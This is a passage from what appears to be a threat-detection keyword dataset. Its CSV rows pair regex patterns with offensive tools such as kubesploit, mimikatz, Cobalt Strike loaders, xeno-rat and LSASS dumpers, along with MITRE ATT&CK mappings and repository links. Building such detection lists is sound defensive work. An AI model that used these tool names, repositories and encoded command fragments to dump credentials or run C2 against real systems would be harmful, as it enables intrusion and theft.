TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*kubesploitAgent-Darwin*",".{0,1000}kubesploitAgent\-Darwin.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - 
TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*kubesploitAgent-Linux*",".{0,1000}kubesploitAgent\-Linux.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*kubesploit-main*",".{0,1000}kubesploit\-main.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*kubesploitServer-Darwin*",".{0,1000}kubesploitServer\-Darwin.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*kubesploitServer-Linux*",".{0,1000}kubesploitServer\-Linux.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*kubestroyer -t *",".{0,1000}kubestroyer\s\-t\s.{0,1000}","offensive_tool_keyword","Kubestroyer","Kubestroyer aims to exploit 
Kubernetes clusters misconfigurations and be the swiss army knife of your Kubernetes pentests","T1588.002 - T1596 - T1552.004","TA0005 - TA0007","N/A","N/A","Exploitation tools","https://github.com/Rolix44/Kubestroyer","1","0","N/A","10","4","346","22","2024-04-02T22:32:59Z","2022-09-15T13:31:21Z" "*Kubestroyer@latest*",".{0,1000}Kubestroyer\@latest.{0,1000}","offensive_tool_keyword","Kubestroyer","Kubestroyer aims to exploit Kubernetes clusters misconfigurations and be the swiss army knife of your Kubernetes pentests","T1588.002 - T1596 - T1552.004","TA0005 - TA0007","N/A","N/A","Exploitation tools","https://github.com/Rolix44/Kubestroyer","1","0","N/A","10","4","346","22","2024-04-02T22:32:59Z","2022-09-15T13:31:21Z" "*kubestroyer_linux_x64*",".{0,1000}kubestroyer_linux_x64.{0,1000}","offensive_tool_keyword","Kubestroyer","Kubestroyer aims to exploit Kubernetes clusters misconfigurations and be the swiss army knife of your Kubernetes pentests","T1588.002 - T1596 - T1552.004","TA0005 - TA0007","N/A","N/A","Exploitation tools","https://github.com/Rolix44/Kubestroyer","1","1","N/A","10","4","346","22","2024-04-02T22:32:59Z","2022-09-15T13:31:21Z" "*kubestroyer_macos_arm64*",".{0,1000}kubestroyer_macos_arm64.{0,1000}","offensive_tool_keyword","Kubestroyer","Kubestroyer aims to exploit Kubernetes clusters misconfigurations and be the swiss army knife of your Kubernetes pentests","T1588.002 - T1596 - T1552.004","TA0005 - TA0007","N/A","N/A","Exploitation tools","https://github.com/Rolix44/Kubestroyer","1","1","N/A","10","4","346","22","2024-04-02T22:32:59Z","2022-09-15T13:31:21Z" "*kubestroyer_macos_x64*",".{0,1000}kubestroyer_macos_x64.{0,1000}","offensive_tool_keyword","Kubestroyer","Kubestroyer aims to exploit Kubernetes clusters misconfigurations and be the swiss army knife of your Kubernetes pentests","T1588.002 - T1596 - T1552.004","TA0005 - TA0007","N/A","N/A","Exploitation 
tools","https://github.com/Rolix44/Kubestroyer","1","1","N/A","10","4","346","22","2024-04-02T22:32:59Z","2022-09-15T13:31:21Z" "*kubestroyer_windows_x64*",".{0,1000}kubestroyer_windows_x64.{0,1000}","offensive_tool_keyword","Kubestroyer","Kubestroyer aims to exploit Kubernetes clusters misconfigurations and be the swiss army knife of your Kubernetes pentests","T1588.002 - T1596 - T1552.004","TA0005 - TA0007","N/A","N/A","Exploitation tools","https://github.com/Rolix44/Kubestroyer","1","1","N/A","10","4","346","22","2024-04-02T22:32:59Z","2022-09-15T13:31:21Z" "*Kubestroyer-master*",".{0,1000}Kubestroyer\-master.{0,1000}","offensive_tool_keyword","Kubestroyer","Kubestroyer aims to exploit Kubernetes clusters misconfigurations and be the swiss army knife of your Kubernetes pentests","T1588.002 - T1596 - T1552.004","TA0005 - TA0007","N/A","N/A","Exploitation tools","https://github.com/Rolix44/Kubestroyer","1","0","N/A","10","4","346","22","2024-04-02T22:32:59Z","2022-09-15T13:31:21Z" "*Kudaes/Elevator*",".{0,1000}Kudaes\/Elevator.{0,1000}","offensive_tool_keyword","Elevator","UAC bypass by abusing RPC and debug objects.","T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Kudaes/Elevator","1","1","N/A","10","6","589","68","2023-10-19T08:51:09Z","2022-08-25T21:39:28Z" "*kuhl_m_dpapi_chrome.c*",".{0,1000}kuhl_m_dpapi_chrome\.c.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","1","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*kuhl_m_lsadump.c*",".{0,1000}kuhl_m_lsadump\.c.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - 
T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","1","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*kuhl_m_sekurlsa_nt6.c*",".{0,1000}kuhl_m_sekurlsa_nt6\.c.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*kuhl_m_sekurlsa_nt6.h*",".{0,1000}kuhl_m_sekurlsa_nt6\.h.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*kuhl_m_sekurlsa_packages.c*",".{0,1000}kuhl_m_sekurlsa_packages\.c.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*kuhl_m_sekurlsa_packages.h*",".{0,1000}kuhl_m_sekurlsa_packages\.h.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*kuhl_m_sekurlsa_utils.c*",".{0,1000}kuhl_m_sekurlsa_utils\.c.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*kuhl_m_sekurlsa_utils.c*",".{0,1000}kuhl_m_sekurlsa_utils\.c.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","1","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*kuhl_m_sekurlsa_utils.h*",".{0,1000}kuhl_m_sekurlsa_utils\.h.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. 
PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*kwallet2john.py*",".{0,1000}kwallet2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*kyleavery/AceLdr*",".{0,1000}kyleavery\/AceLdr.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike UDRL for memory scanner evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth 
- menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/AceLdr","1","1","N/A","10","10","808","151","2023-09-28T19:47:03Z","2022-08-11T00:06:09Z" "*kyleavery/inject-assembly*",".{0,1000}kyleavery\/inject\-assembly.{0,1000}","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/inject-assembly","1","1","N/A","10","10","467","73","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z" "*kyleavery/pendulum*",".{0,1000}kyleavery\/pendulum.{0,1000}","offensive_tool_keyword","pendulum","Linux Sleep Obfuscation","T1027 - T1036","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/kyleavery/pendulum","1","1","N/A","9","1","85","10","2024-01-07T20:33:01Z","2024-01-07T20:32:38Z" "*'l', 's', 'a', 's', 's', '.', 'e', 'x', 'e'*",".{0,1000}\'l\',\s\'s\',\s\'a\',\s\'s\',\s\'s\',\s\'\.\',\s\'e\',\s\'x\',\s\'e\'.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using 
C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","0","N/A","10","3","263","44","2024-04-20T03:59:46Z","2024-04-09T16:33:27Z" "*'l','s','a','s','s','.','e','x','e'*",".{0,1000}\'l\',\'s\',\'a\',\'s\',\'s\',\'\.\',\'e\',\'x\',\'e\'.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","N/A","10","1","29","81","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z" "*L04DUr118(h00k*",".{0,1000}L04DUr118\(h00k.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*L0MgY2hvaWNlIC9DIFkgL04gL0QgWSAvVCAzICYgRGVsICI=*",".{0,1000}L0MgY2hvaWNlIC9DIFkgL04gL0QgWSAvVCAzICYgRGVsICI\=.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*L0phtCrack*",".{0,1000}L0phtCrack.{0,1000}","offensive_tool_keyword","L0phtCrack","L0phtCrack attempts to crack Windows passwords from hashes which it can obtain (given proper access) from stand-alone Windows workstations. networked servers. primary domain controllers. 
or Active Directory. In some cases it can sniff the hashes off the wire. It also has numerous methods of generating password guesses (dictionary. brute force. etc). LC5 was discontinued by Symantec in 2006. then re-acquired by the original L0pht guys and reborn as LC6 in 2009. For free alternatives. consider ophcrack. Cain and Abel. or John the Ripper. For downloads and more information. visit the L0phtCrack homepage.","T1003 - T1110 - T1212 - T1552 - T1609","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Credential Access","http://www.l0phtcrack.com/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*l3m0n/WinPirate*",".{0,1000}l3m0n\/WinPirate.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","1","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*L3Vzci9iaW4vd2hvYW1p*",".{0,1000}L3Vzci9iaW4vd2hvYW1p.{0,1000}","offensive_tool_keyword","whoami","whoami is a legitimate command used to identify the current user executing the command in a terminal or command prompt.whoami can be used to gather information about the current user's privileges. credentials. and account name. which can then be used for Lateral Movement. privilege escalation. or targeted attacks within the compromised network.","T1003.001 - T1087 - T1057 ","TA0006 - TA0007","N/A","N/A","Collection","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" "*LABEL name=""Maitm""*",".{0,1000}LABEL\sname\=\""Maitm\"".{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. 
This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","8","1","78","9","2024-04-01T15:28:44Z","2024-02-21T07:25:37Z" "*label-implant *",".{0,1000}label\-implant\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Ladon * AllScan*",".{0,1000}Ladon\s.{0,1000}\sAllScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon * CiscoScan*",".{0,1000}Ladon\s.{0,1000}\sCiscoScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon * OnlineIP*",".{0,1000}Ladon\s.{0,1000}\sOnlineIP.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon * OnlinePC*",".{0,1000}Ladon\s.{0,1000}\sOnlinePC.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon * OsScan*",".{0,1000}Ladon\s.{0,1000}\sOsScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon * OxidScan*",".{0,1000}Ladon\s.{0,1000}\sOxidScan.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
